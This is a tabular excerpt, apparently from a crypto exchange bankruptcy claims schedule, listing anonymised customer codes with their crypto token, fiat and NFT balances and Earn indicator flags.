| 07355739 | | BRZ[3], BTC[0], CUSDT[11], DOGE[0], ETH[0], LTC[0], USD[0.00], USDT[1.00398969] | Yes | |
| 07355741 | | BAT[8.57905613], BRZ[3], BTC[.01787317], CUSDT[10], DOGE[1306.28595451], ETH[.82939651], ETHW[.82939651], GRT[1], SHIB[1], TRX[344.56790942], USD[2357.79] | | |
| 07355742 | | BTC[.00023082], SGD[0.32], USDT[0] | | |
| 07355743 | | CUSDT[.00004793], DOGE[.00003056], TRX[.0000028], USD[0.01] | | |
| 07355744 | | USD[10.00] | | |
| 07355745 | | USD[10.00] | | |
| 07355746 | | USD[1.06], USDT[0] | | |
| 07355747 | | BRZ[0], BTC[0], DOGE[0], TRX[0], USD[0.01] | Yes | |
| 07355748 | | USD[10.00] | | |
| 07355749 | | DOGE[479.97592814], USD[2.54] | | |
| 07355750 | | USD[10.00] | | |
| 07355753 | | CUSDT[5], DOGE[382.80536068], SHIB[2], TRX[1], USD[0.00] | | |
| 07355754 | | USD[10.00] | | |
| 07355755 | | USD[10.00] | | |
| 07355756 | | USD[10.00] | | |
| 07355757 | | USD[10.00] | | |
| 07355758 | | BRZ[0], CUSDT[1], DOGE[.00390997], TRX[1.00007542], USD[0.01] | | |
| 07355759 | | USD[10.00] | | |
| 07355760 | | USD[10.00] | | |
| 07355762 | | CUSDT[1], DOGE[548.49444874], USD[0.00] | Yes | |
| 07355763 | | BAT[0], BRZ[0], DOGE[0], ETH[0], GRT[0], USD[0.00], USDT[0] | | |
| 07355764 | | BRZ[2], CUSDT[5], DOGE[0], TRX[4], USD[270.35], USDT[0] | | |
| 07355765 | | USD[10.00] | | |
| 07355766 | | DOGE[1], USD[0.01] | | |
| 07355767 | | USD[10.00] | | |
| 07355768 | | USD[10.00] | | |
| 07355770 | | USD[10.00] | | |
| 07355771 | | CUSDT[7], TRX[1], USD[0.00] | Yes | |
| 07355772 | | USD[10.00] | | |
| 07355774 | | BRZ[1], CUSDT[6], DOGE[1435.48701936], TRX[1], USD[0.00] | Yes | |
| 07355775 | | USD[10.00] | | |
| 07355776 | | USD[10.00] | | |
| 07355777 | | USD[10.00] | | |
| 07355778 | | CUSDT[8], DOGE[2260.80984466], TRX[192.63491234], USD[2.99] | | |
| 07355779 | | DOGE[125437.17660491], SOL[11.27550808], TRX[3153.32831912], USD[6.93], USDT[0] | | |
| 07355780 | | USD[10.00] | | |
| 07355782 | | BRZ[2], CUSDT[2], DOGE[50620.34261206], TRX[4], USD[0.10], USDT[0] | Yes | |
| 07355783 | | USD[10.00] | | |
| 07355785 | | BRZ[1], DOGE[1], ETH[.00001783], ETHW[.00001783], GRT[1], SHIB[1], SUSHI[.6768713], USD[0.01] | Yes | |
| 07355786 | | USD[10.00] | | |
| 07355787 | | USD[10.00] | | |
| 07355789 | | USD[10.00] | | |
| 07355792 | | USD[10.00] | | |
| 07355793 | | USD[10.00] | | |
| 07355794 | | GRT[1], USD[0.00] | | |
| 07355795 | | CUSDT[1], DOGE[3002.39507904], USD[0.00] | | |
| 07355797 | | USD[10.00] | | |
| 07355798 | | BRZ[1], BTC[.04808043], CUSDT[2], DOGE[9334.30700193], GRT[1.00019173], LTC[3.74922702], SUSHI[33.68029323], TRX[13429.5217676], USD[0.47] | Yes | |
| 07355800 | | USD[10.00] | | |
| 07355801 | | USD[10.00] | | |
| 07355802 | | BRZ[1], CUSDT[11], DAI[132.44851969], DOGE[4], NFT (312809891320618250/Entrance Voucher #3392)[1], SHIB[1], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07355804 | | BCH[0], BTC[0], DOGE[0], ETH[0], GRT[5713.49837308], LTC[0], NFT (294047301514569549/FTX - Off The Grid Miami #8)[1], NFT (391155954514876296/Barcelona Ticket Stub #2383)[1], NFT (396130933318337787/Monaco Ticket Stub #139)[1], NFT (399134696348046124/Common Cryptogram)[1], NFT (402118060581076951/FTX Crypto Cup 2022 Key #2426)[1], NFT (414268456292991235/Romeo #940)[1], NFT (427437077308118893/Ex Populus Trading Card Game)[1], NFT (466737484368809280/Entrance Voucher #3799)[1], NFT (513285300796324580/Saudi Arabia Ticket Stub #1777)[1], NFT (530216406941909916/Common Cryptogram)[1], NFT (534918900103972909/Humpty Dumpty #266)[1], SHIB[110332560.38522342], USD[0.00], USDT[0] | Yes | |
| 07355805 | | CUSDT[6], DOGE[2], EUR[20.79], SGD[0.07], TRX[.11552712], USD[0.00] | | |
| 07355807 | | DOGE[1], LTC[0], SUSHI[.00017513], USD[0.00] | | |
| 07355808 | | BTC[0], CUSDT[1], DOGE[33.86883268], TRX[3], USD[0.30] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355810 | | USD[10.00] | | |
| 07355811 | | CUSDT[4], ETH[.00238465], ETHW[.00238465], USD[0.00] | | |
| 07355812 | | CUSDT[1], DOGE[1.00265433], GRT[6.13892143], USD[0.00] | Yes | |
| 07355813 | | USD[10.00] | | |
| 07355814 | | DOGE[0.00528740], NFT (43072254746072183/Sleepy pug)[1], SHIB[0], USD[0.00] | Yes | |
| 07355815 | | CUSDT[49.978264009], DOGE[2346.65143851], TRX[2], USD[0.00] | | |
| 07355816 | | BTC[.01839502], CUSDT[11], DOGE[84.93721731], ETH[.06433819], ETHW[.06354], SHIB[2], USD[0.00] | Yes | |
| 07355819 | | USD[10.00] | | |
| 07355820 | | TRX[1], USD[0.90] | | |
| 07355821 | | USD[10.00] | | |
| 07355822 | | DOGE[1.00001549], USD[0.01] | | |
| 07355824 | | CUSDT[1], DOGE[5675.83558661], GRT[1], USD[3.33] | | |
| 07355825 | | USD[10.00] | | |
| 07355827 | | USD[10.00] | | |
| 07355829 | | DOGE[13102.55852649], USD[0.00] | | |
| 07355830 | | USD[10.00] | | |
| 07355831 | | USD[10.49] | Yes | |
| 07355832 | | CUSDT[1], DOGE[26.19359009], SOL[.66220951], USD[0.00], USDT[0] | | |
| 07355834 | | CUSDT[2], DOGE[474.78044583], USD[0.00] | | |
| 07355835 | | USD[10.00] | | |
| 07355836 | | USD[0.00] | Yes | |
| 07355837 | | USD[0.00] | | |
| 07355838 | | USD[10.00] | | |
| 07355839 | | USD[10.00] | | |
| 07355840 | | DOGE[39.83688574], USD[0.00] | Yes | |
| 07355841 | | CUSDT[2], DOGE[1.00003031], USD[0.00] | | |
| 07355842 | | USD[10.00] | | |
| 07355843 | | CUSDT[1], DOGE[3], TRX[1], USD[0.00] | | |
| 07355844 | | BTC[.00025711], CUSDT[1], DOGE[1298.3069455], TRX[1], USD[2.00] | | |
| 07355845 | | GRT[.931], SOL[22.21898], USD[9.56] | | |
| 07355846 | | USD[10.00] | | |
| 07355847 | | USD[10.00] | | |
| 07355848 | | BTC[0.00000191], CUSDT[3], DOGE[.00497367], ETH[.0000009], ETHW[.0000009], SHIB[2], TRX[2], USD[0.01] | Yes | |
| 07355849 | | USD[10.00] | | |
| 07355850 | | USD[10.00] | | |
| 07355851 | | USD[10.00] | | |
| 07355852 | | GRT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07355853 | | USD[10.00] | | |
| 07355854 | | USD[10.00] | | |
| 07355856 | | USD[10.00] | | |
| 07355857 | | USD[10.00] | | |
| 07355858 | | DOGE[.84032357], USD[0.03] | | |
| 07355859 | | USD[10.00] | | |
| 07355860 | | USD[10.00] | | |
| 07355861 | | DOGE[1], GRT[65.17096193], TRX[1], USD[0.00] | | |
| 07355864 | | CUSDT[1], DOGE[14554.8721696], TRX[1], USD[0.00] | | |
| 07355865 | | CUSDT[2], DOGE[524.59671154], LINK[4.58750065], USD[441.23] | Yes | |
| 07355866 | | USD[10.00] | | |
| 07355867 | | USD[10.00] | | |
| 07355868 | | USD[10.00] | | |
| 07355869 | | CUSDT[3], EUR[15.27], USD[0.00] | | |
| 07355870 | | BTC[.00021074], USD[0.00] | | |
| 07355871 | | USD[10.00] | | |
| 07355872 | | BAT[2244.56843552], BRZ[2], CUSDT[2], DOGE[3], MATIC[2126.2041358], SOL[68.53263142], SUSHI[0], TRX[4], USD[0.00], USDT[1.06812667] | Yes | |
| 07355873 | | USD[10.00] | | |
| 07355874 | | USD[10.00] | | |
| 07355877 | | USD[10.00] | | |
| 07355879 | | CUSDT[2], TRX[1], USD[13.43] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355880 | | DOGE[23.59307698], USD[0.00] | | |
| 07355881 | | CUSDT[2], DOGE[909.74767861], TRX[1], USD[0.00] | | |
| 07355882 | | USD[0.00] | | |
| 07355883 | | BRZ[0], CUSDT[0], DOGE[2081.13851322], ETH[0], LINK[0], LTC[0], SHIB[12131187.3766417], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07355884 | | BCH[.57316074], BRZ[1], BTC[.01350633], CUSDT[22], DOGE[4619.95261109], ETH[.22596329], ETHW[.22575523], LINK[.77123493], LTC[.67516085], SUSHI[10.82670778], TRX[3548.8926047], USD[800.02] | Yes | |
| 07355885 | | USD[10.00] | | |
| 07355886 | | USD[0.00] | | |
| 07355888 | | DOGE[265.53925798], USD[10.00] | | |
| 07355889 | | BRZ[3], CUSDT[2], DOGE[1106.10479701], GRT[1], SHIB[2], TRX[2], USD[0.00], USDT[0] | | |
| 07355891 | | BTC[.00028116], SHIB[1], USD[0.00] | Yes | |
| 07355893 | | USD[10.00] | | |
| 07355894 | | BRZ[.00029804], BTC[0.00000569], DOGE[0], USD[10.00] | | |
| 07355895 | | BAT[0], BTC[0], CUSDT[1], DOGE[2], GRT[0], LINK[0], TRX[0], USD[0.00] | Yes | |
| 07355896 | | BTC[.00017619], USD[0.00] | | |
| 07355897 | | USD[0.01] | | |
| 07355898 | | BRZ[0.00002158], USD[0.00] | | |
| 07355900 | | USD[10.00] | | |
| 07355901 | | USD[0.00] | | |
| 07355902 | | CUSDT[1], DOGE[2], USD[0.01] | | |
| 07355903 | | USD[10.00] | | |
| 07355904 | | USD[0.05] | | |
| 07355905 | | BRZ[0], ETH[.00001317], ETHW[.00001317], USD[0.00] | | |
| 07355906 | | USD[10.00] | | |
| 07355907 | | USD[0.02] | | |
| 07355909 | | USD[10.00] | | |
| 07355910 | | USD[10.00] | | |
| 07355911 | | USD[10.00] | | |
| 07355912 | | BTC[.00014686], CUSDT[1], DOGE[756.14446494], TRX[2], USD[0.58] | | |
| 07355913 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07355914 | | BRZ[0], DOGE[2], USD[0.00] | | |
| 07355915 | | USD[10.00] | | |
| 07355916 | | BAT[0], CUSDT[1], DOGE[0], USD[0.00] | Yes | |
| 07355917 | | USD[10.00] | | |
| 07355918 | | USD[10.00] | | |
| 07355919 | | BRZ[1], BTC[.00184919], CUSDT[4], DOGE[5514.35464398], TRX[2], USD[0.00] | | |
| 07355920 | | BRZ[3], BTC[.00001478], DOGE[13.81408787], TRX[476.44747002], USD[0.52] | | |
| 07355921 | | DOGE[192.55675706], USD[0.00] | | |
| 07355922 | | BRZ[1], USD[0.42], USDT[1] | | |
| 07355923 | | USD[0.00], USDT[0] | | |
| 07355924 | | ETH[.00000001], SHIB[10642526.80896474], USD[0.00] | Yes | |
| 07355926 | | USD[10.00] | | |
| 07355927 | | DOGE[0], USD[10.00] | | |
| 07355928 | | USD[10.00] | | |
| 07355929 | | USD[10.00] | | |
| 07355930 | | BTC[.00022061], USD[0.00] | | |
| 07355931 | | CUSDT[2], DOGE[14.19316809], USD[0.33] | Yes | |
| 07355932 | | TRX[1], USD[0.00] | | |
| 07355933 | | DOGE[1021.71178409], USD[0.00] | | |
| 07355934 | | USD[0.00] | | |
| 07355936 | | USD[0.00] | | |
| 07355937 | | USD[10.00] | | |
| 07355938 | | USD[10.00] | | |
| 07355939 | | DOGE[1], SHIB[202043.53323988], USD[0.00] | Yes | |
| 07355940 | | BTC[.00024489], CUSDT[1], USD[0.00] | Yes | |
| 07355941 | | BAT[.00000922], BCH[.00000006], BTC[0], DOGE[1], GRT[.00002069], USD[0.00], USDT[.00000923] | Yes | |
| 07355942 | | USD[10.00] | | |
| 07355943 | | CUSDT[2], DOGE[1], TRX[1], USD[0.01] | | |
| 07355944 | | CUSDT[4], DOGE[403.27041042], SHIB[1085302.74019394], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355945 | | BTC[0], DOGE[0], ETH[0], SHIB[3], SOL[0], USD[0.00] | Yes | |
| 07355946 | | USD[10.00] | | |
| 07355947 | | BTC[.00000037], USD[0.00] | | |
| 07355948 | | BRZ[2], DOGE[.00405769], CUSDT[5], DOGE[5.14305796], ETH[.35892186], ETHW[.35877098], GRT[23.16779135], LINK[29.17904662], SOL[6.02289276], TRX[6], USD[0.00] | Yes | |
| 07355949 | | BAT[84.83291719], DOGE[3], GRT[1.00367791], USD[0.00] | Yes | |
| 07355950 | | KSHIB[2.90778278], USD[0.00], USDT[0] | | |
| 07355951 | | USD[10.00] | | |
| 07355952 | | CUSDT[2], DOGE[2], ETH[.00801388], ETHW[.00791812], NFT (453102940247698704/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #41)[1], TRX[1], USD[0.00] | Yes | |
| 07355953 | | BTC[.00021164], DOGE[1], USD[0.00] | Yes | |
| 07355954 | | USD[10.00] | | |
| 07355955 | | BRZ[1], CUSDT[1], DOGE[3], GRT[1], TRX[2], USD[0.01], USDT[1] | | |
| 07355956 | | USD[10.00] | | |
| 07355957 | | CUSDT[1], DOGE[.00017683], TRX[1], USD[10.00] | | |
| 07355958 | | BRZ[1], DOGE[1], GRT[1], TRX[2], USD[10.00] | | |
| 07355959 | | DOGE[.649], USD[0.00] | | |
| 07355960 | | USD[10.00] | | |
| 07355963 | | USD[10.00] | | |
| 07355964 | | USD[10.00] | | |
| 07355965 | | BRZ[1], CUSDT[4], DOGE[1], SOL[12.28217260], SUSHI[.10944947], TRX[1], USD[2312.40] | Yes | |
| 07355967 | | DOGE[834.35273847], TRX[1072.56128371], USD[0.00] | Yes | |
| 07355968 | | USD[10.99] | Yes | |
| 07355969 | | USD[10.00] | | |
| 07355970 | | USD[10.00] | | |
| 07355971 | | DOGE[.00004576], ETH[0], ETHW[0], TRX[1], USD[0.00] | | |
| 07355972 | | DOGE[1], USD[0.00] | | |
| 07355973 | | USD[10.00] | | |
| 07355974 | | USD[10.00] | | |
| 07355975 | | USD[10.00] | | |
| 07355977 | | NFT (290207072048507056/SolBunnies #1337)[1], NFT (295248958519782059/Anti Social Bot #2840)[1], NFT (296224639546239574/Waves of the Metaverse #10)[1], NFT (304717978885711409/Pretto #10)[1], NFT (332745184661724582/Catverse#5)[1], NFT (338943716212441238/Catverse#3)[1], NFT (361282020151683497/Catverse #12)[1], NFT (408582775255260044/#9943)[1], NFT (475331073749343391/Soulless #7008)[1], SOL[.01385563], USD[0.00] | | |
| 07355979 | | USD[10.00] | | |
| 07355981 | | USD[10.00] | | |
| 07355982 | | BRZ[1], CUSDT[8], DOGE[33.190969], TRX[1], USD[122.04] | | |
| 07355983 | | USD[10.00] | | |
| 07355984 | | USD[10.00] | | |
| 07355987 | | GRT[14.08025202], USD[0.00] | | |
| 07355988 | | TRX[1], USD[0.01] | Yes | |
| 07355989 | | USD[0.00] | | |
| 07355990 | | USD[10.00] | | |
| 07355991 | | BRZ[0], DOGE[0], GRT[0], TRX[0], USD[0.00] | | |
| 07355992 | | USD[10.00] | | |
| 07355993 | | USD[10.00] | | |
| 07355994 | | DOGE[1], LINK[5.89561723], TRX[1], USD[0.00] | | |
| 07355995 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07355996 | | CUSDT[2], DOGE[0], LINK[0], USD[0.01], USDT[0] | | |
| 07355997 | | DOGE[105.96009928], USD[0.25] | | |
| 07355998 | | DOGE[13.79842888], USD[0.00] | | |
| 07355999 | | USD[10.00] | | |
| 07356000 | | BAT[0], BRZ[0], BTC[0], CUSDT[8], DOGE[0], TRX[0], USD[0.00] | Yes | |
| 07356001 | | USD[10.00] | | |
| 07356002 | | USD[10.00] | | |
| 07356003 | | USD[10.00] | | |
| 07356004 | | SHIB[83183.35211725], USD[0.00] | Yes | |
| 07356005 | | CUSDT[2], DOGE[0], USD[0.01] | | |
| 07356006 | | BTC[0], DOGE[.00008683], USD[0.00] | Yes | |
| 07356007 | | BAT[1], BRZ[1], BTC[.00539482], CUSDT[3], DOGE[2281.44260302], ETH[.05177643], ETHW[.05177643], TRX[3], USD[0.54] | | |
| 07356009 | | USD[10.00] | | |
| 07356011 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356013 | | USD[0.00], USDT[0] | | |
| 07356015 | | BAT[1634.20451586], CUSDT[140290.07939584], DOGE[1.28996185], TRX[24488.88051013], USD[0.00] | | |
| 07356016 | | SHIB[2167.236022], USD[0.00] | Yes | |
| 07356017 | | DOGE[0], GRT[0], TRX[0], USD[0.00], USDT[.1041128] | | |
| 07356018 | | BAT[612.34490932], CUSDT[29985.80242125], DOGE[2], TRX[36310.657805], USD[0.00], USDT[1] | | |
| 07356020 | | BRZ[2], CUSDT[19], TRX[8], USD[0.00] | | |
| 07356022 | | BRZ[2], CUSDT[6], DOGE[.00003634], ETH[.61886822], ETHW[.61886822], TRX[1687.02848735], USD[0.01] | | |
| 07356023 | | USD[10.00] | | |
| 07356024 | | USD[0.00], USDT[.00002082] | | |
| 07356025 | | CUSDT[4], USD[0.21] | | |
| 07356026 | | USD[10.00] | | |
| 07356027 | | USD[10.00] | | |
| 07356028 | | USD[10.00] | | |
| 07356029 | | USD[10.00] | | |
| 07356030 | | BAT[0], BCH[0], BRZ[0], DOGE[0], ETH[0], GRT[0], LINK[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07356033 | | DOGE[134.0482394], USD[0.00] | | |
| 07356034 | | DOGE[1], LINK[.56542305], USD[0.00] | | |
| 07356036 | | BF_POINT[400], BRZ[1], CUSDT[14], ETH[.00000171], LINK[1.09240412], MATIC[425.30665783], NFT [3237600254734778770/Bahrain Ticket Stub #1794][1], NFT [44399209215184869/Barcelona Ticket Stub #474][1], TRX[6], USD[0.01], USDT[1.08653972] | Yes | |
| 07356038 | | DOGE[25.88252151], USD[0.00] | | |
| 07356039 | | USD[10.00] | | |
| 07356040 | | USD[10.00] | | |
| 07356041 | | BAT[1], BRZ[5.07952967], CUSDT[43], DOGE[2826.09035571], ETH[1.60100298], ETHW[1.60033047], GRT[1.00498957], SHIB[292213.4402281], SOL[.00011325], TRX[9], USD[0.00], USDT[0] | Yes | |
| 07356042 | | USD[10.00] | | |
| 07356043 | | USD[0.00] | | |
| 07356044 | | BAT[1.01320043], BRZ[2], CUSDT[5], DOGE[1], USD[0.00], USDT[0] | Yes | |
| 07356045 | | USD[10.00] | | |
| 07356046 | | CUSDT[3], DOGE[0.00099004], TRX[.00001969], UNI[.00002321], USD[0.01] | | |
| 07356047 | | USD[0.01] | | |
| 07356048 | | USD[10.00] | | |
| 07356049 | | BF_POINT[700], ETH[0], NFT [568036633030114278/FTX - Off The Grid Miami #887][1], SOL[0], USD[0.11] | Yes | |
| 07356050 | | BTC[.00232545], CUSDT[2], DOGE[1.00003895], USD[0.00] | Yes | |
| 07356052 | | USD[10.00] | | |
| 07356053 | | USD[10.00] | | |
| 07356054 | | BRZ[1], BTC[.00389734], CUSDT[949.33922381], DOGE[1384.19163043], NFT [546378987887721410/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #42][1], NFT [546852807136014405/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #74][1], SHIB[165207.33520568], SOL[.07549249], TRX[70.21786209], USD[0.00] | | |
| 07356055 | | BRZ[0], DOGE[0], ETH[0], SUSHI[0], USD[10.00], USDT[0.00016794] | | |
| 07356057 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07356058 | | AAVE[0.00000085], BAT[0.00042542], CUSDT[6], DOGE[2], ETH[.00516456], ETHW[.00509616], SHIB[0], USD[0.00] | Yes | |
| 07356059 | | USD[10.00] | | |
| 07356060 | | USD[10.00] | | |
| 07356062 | | AVAX[0], BRZ[1], CUSDT[2], ETH[0.00000009], ETHW[0.00000009], SHIB[7], SOL[.00443015], TRX[2], USD[0.00], USDT[0.00000527] | Yes | |
| 07356063 | | SUSHI[0], USD[0.01], USDT[0] | | |
| 07356064 | | USD[10.00] | | |
| 07356065 | | TRX[1], USD[0.00] | | |
| 07356066 | | USD[10.00] | | |
| 07356067 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07356069 | | USD[0.00], USDT[0] | | |
| 07356070 | | USD[10.00] | | |
| 07356072 | | SHIB[1], USD[0.00] | Yes | |
| 07356074 | | USD[10.00] | | |
| 07356075 | | USD[0.00], USDT[0] | | |
| 07356076 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], TRX[0], USD[0.00] | | |
| 07356077 | | USD[10.00] | | |
| 07356078 | | USD[0.00] | | |
| 07356079 | | BAT[2], BRZ[3], CUSDT[12], SHIB[1]. SOL[.15], TRX[1], USD[0.01] | | |
| 07356080 | | CUSDT[8], TRX[4], USD[0.00] | | |
| 07356081 | | NFT [444716893209173233/Entrance Voucher #4116][1], USD[0.27] | Yes | |
| 07356082 | | DOGE[200483.27554433], ETH[.00000001], ETHW[0], USD[67763.09], USDT[0.00000001] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356083 | | CUSDT[1], USD[0.00] | | |
| 07356084 | | USD[10.00] | | |
| 07356085 | | NFT (556712031781987870/FTX - Off The Grid Miami #394)[1], USD[0.00] | | |
| 07356086 | | GRT[4.80527924], USD[0.00] | | |
| 07356087 | | ETH[0], USD[0.00] | Yes | |
| 07356088 | | USD[10.00] | | |
| 07356089 | | DOGE[1.11292606], USD[0.00], USDT[0] | | |
| 07356090 | | CUSDT[2], DOGE[1], TRX[3], USD[10.00] | | |
| 07356091 | | USD[0.01] | | |
| 07356092 | | BRZ[1], CUSDT[2], DOGE[1.010028], TRX[1], USD[0.00] | | |
| 07356093 | | ETH[.00343325], ETHW[.00339221], USD[0.00] | Yes | |
| 07356094 | | USD[10.00] | | |
| 07356095 | | BAT[1.00420977], CUSDT[12], DOGE[1.00135559], SHIB[479.16715967], TRX[2], USD[0.01] | Yes | |
| 07356096 | | DOGE[13999.91926713], TRX[4030.72635317], USD[0.00] | | |
| 07356097 | | USD[10.00] | | |
| 07356098 | | USD[0.00], USDT[0] | | |
| 07356099 | | CUSDT[1], DOGE[1], ETH[.37649715], ETHW[.37649715], TRX[541.17994806], USD[105.00], USDT[1] | | |
| 07356100 | | CUSDT[3], TRX[56.32097564], USD[0.00] | Yes | |
| 07356101 | | USD[10.00] | | |
| 07356102 | | CUSDT[1], GRT[1], USD[0.00] | | |
| 07356103 | | USD[10.00] | | |
| 07356104 | | DOGE[.00007567], USD[0.00] | | |
| 07356105 | | BRZ[1], CUSDT[4], DOGE[1], ETH[0], ETHW[0], USD[23.22] | | |
| 07356106 | | USD[10.00] | | |
| 07356107 | | CUSDT[1141.70593414], DOGE[2959.93695246], ETH[.06726949], ETHW[.06726949], SHIB[1114093.16408828], TRX[235.10736407], USD[200.23] | | |
| 07356108 | | USD[25.00] | | |
| 07356109 | | BAT[1.01541262], BRZ[2], BTC[.01669017], GRT[1.00302442], LINK[1.08568674], TRX[3], USD[0.00] | Yes | |
| 07356111 | | USD[10.00] | | |
| 07356112 | | USD[10.00] | | |
| 07356113 | | LTC[0], SOL[0.00000001], USD[0.00], USDT[0] | | |
| 07356114 | | USD[10.00] | | |
| 07356115 | | CUSDT[12], DOGE[11411.33852871], SHIB[1008811.17649381], TRX[479.96222273], USD[0.00] | Yes | |
| 07356116 | | USD[0.01] | | |
| 07356118 | | DOGE[2193.93567586], USD[0.15] | | |
| 07356119 | | TRX[1], USD[0.05], USDT[0.00065167] | | |
| 07356120 | | USD[10.00] | | |
| 07356124 | | USD[10.00] | | |
| 07356125 | | DOGE[1.00005887], TRX[2], USD[0.01] | | |
| 07356126 | | USD[10.00] | | |
| 07356127 | | USD[10.00] | | |
| 07356128 | | BRZ[2], CUSDT[6], DOGE[7.45715285], ETH[0], SHIB[17677.01842296], SOL[0.41592161], SUSHI[0], TRX[4], USD[0.00] | Yes | |
| 07356129 | | BRZ[3], CUSDT[7], DOGE[3472.70384852], USD[0.00], USDT[0] | | |
| 07356131 | | BAT[111.45957222], CUSDT[2], DOGE[55118.89595395], GRT[303.93330271], TRX[4040.75246697], USD[0.00] | Yes | |
| 07356132 | | BRZ[1], CUSDT[4], DOGE[8], GRT[243.55088358], LINK[.02174226], SOL[.09999318], TRX[1], UNI[.00003853], USD[1796.83] | | |
| 07356133 | | BTC[.00007863], CUSDT[2], DOGE[618.88338603], LTC[.01753839], USD[0.28] | | |
| 07356134 | | AAVE[0], BCH[0], BTC[0], ETH[0], LTC[0], MKR[0], SOL[0], TRX[0], USD[0.00], USDT[0], YFI[0] | | |
| 07356135 | | USD[10.00] | | |
| 07356136 | | CUSDT[10], DOGE[2416.38995699], TRX[4], USD[496.94], USDT[2] | | |
| 07356137 | | DOGE[ 12183342], USD[0.00] | | |
| 07356138 | | AUD[3.12], BCH[.06276971], BTC[0.00400133], CUSDT[120.62960124], DAI[0.00015015], DOGE[232.71267373], ETH[0.05234306], ETHW[0.05234306], GRT[3.51055911], LINK[1.97610868], LTC[.27304877], PAXG[.00071482], SOL[7.98081554], SUSHI[.86956401], TRX[108.5645772], UNI[1.218837], USD[0.83] | | |
| 07356139 | | BTC[0], DOGE[0.29577744], ETH[0], LTC[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07356140 | | AAVE[0], BRZ[4], CUSDT[37], DOGE[1], GRT[0], TRX[5], USD[0.00], USDT[0.00000001] | | |
| 07356141 | | CUSDT[3], DOGE[2901.70251148], ETH[0], USD[0.00] | | |
| 07356142 | | DOGE[2], TRX[.00482449], USD[0.42] | | |
| 07356145 | | DOGE[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07356146 | | CUSDT[1], DOGE[109.40058516], SHIB[2], TRX[1], USD[15.13], USDT[0] | Yes | |
| 07356147 | | USD[10.00] | | |
| 07356148 | | ETH[.00554655], ETHW[.00554655], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356149 | | BRZ[5.59008182], CUSDT[3], DOGE[0], ETH[.00000022], ETHW[.00000022], SHIB[2], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07356150 | | DOGE[0], ETH[0], TRX[1], USD[0.01] | Yes | |
| 07356151 | | DOGE[139.30448058], USD[0.00] | | |
| 07356152 | | BAT[1], BRZ[3], BTC[.52293136], CUSDT[2], DOGE[3091.24237742], GRT[1], LTC[17.3447233], SOL[2], TRX[5], UNI[1], USD[0.00], USDT[2] | | |
| 07356153 | | USD[10.00] | | |
| 07356154 | | BRZ[2], DOGE[1], USD[0.00] | Yes | |
| 07356156 | | USD[10.00] | | |
| 07356157 | | CUSDT[3], TRX[1], USD[0.00] | Yes | |
| 07356158 | | DOGE[3600.85536839], TRX[1], USD[0.00] | | |
| 07356159 | | USD[10.00] | | |
| 07356160 | | CUSDT[2], DOGE[370.80773249], TRX[1], USD[0.00] | | |
| 07356161 | | USD[10.17] | Yes | |
| 07356162 | | USD[10.00] | | |
| 07356163 | | USD[10.00] | | |
| 07356164 | | BTC[0], DOGE[0.01120236], USD[0.00] | | |
| 07356166 | | BTC[.00017619], USD[0.00] | | |
| 07356167 | | DOGE[1], USD[0.00] | | |
| 07356168 | | BAT[0], BRZ[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], GRT[0], SHIB[1], SOL[0], TRX[1], UNI[0], USD[0.00], USDT[0.00091324] | Yes | |
| 07356169 | | USD[10.00] | | |
| 07356170 | | USD[10.00] | | |
| 07356171 | | CUSDT[2], DOGE[393.64169021], USD[0.10] | | |
| 07356172 | | TRX[66.01683924], USD[0.00] | Yes | |
| 07356173 | | DOGE[186.73507757], USD[0.00] | | |
| 07356174 | | BTC[.00000001], CUSDT[1], USD[0.01] | | |
| 07356176 | | BAT[1], BRZ[2], CUSDT[1], DOGE[82045.03272828], USD[0.00] | | |
| 07356177 | | TRX[2], USD[0.17] | | |
| 07356178 | | BRZ[1], DOGE[0], USD[0.00] | Yes | |
| 07356179 | | USD[10.00] | | |
| 07356180 | | USD[10.00] | | |
| 07356182 | | USD[10.00] | | |
| 07356183 | | CUSDT[1], DOGE[1.67582146], USD[0.00] | | |
| 07356184 | | USD[10.00] | | |
| 07356185 | | ETH[.0652101], ETHW[.0652101], SHIB[1], USD[0.00] | | |
| 07356186 | | USD[10.00] | | |
| 07356187 | | USD[10.00] | | |
| 07356188 | | USD[10.00] | | |
| 07356189 | | LTC[0], USD[0.00] | | |
| 07356190 | | USD[10.00] | | |
| 07356191 | | USD[10.00] | | |
| 07356192 | | DOGE[106.28916926], USD[0.00] | | |
| 07356193 | | USD[10.00] | | |
